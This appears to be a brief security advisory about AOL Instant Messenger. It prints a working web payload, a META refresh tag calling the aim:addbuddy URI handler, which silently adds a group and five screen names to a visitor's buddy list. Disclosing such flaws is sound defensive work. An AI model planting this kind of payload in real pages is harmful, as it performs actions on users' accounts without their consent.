|
AOL Instant Messenger Unauthorized Actions Vulnerability
The following example was submitted: <META HTTP-EQUIV="refresh"CONTENT=0;URL=aim:addbuddy?listofscreennames=mindfliporg,mfliporb,mflipmax,mflips0nic,mflipzorcon&groupname=mindfliporg> A web page loaded with the above code in the META REFRESH tag will automatically add a group called mindfliporg and add the users mindfliporg, mfliporb, mflipmax, mflips0nic, mflipzorcon to buddy list. |
|
|
Privacy Statement |
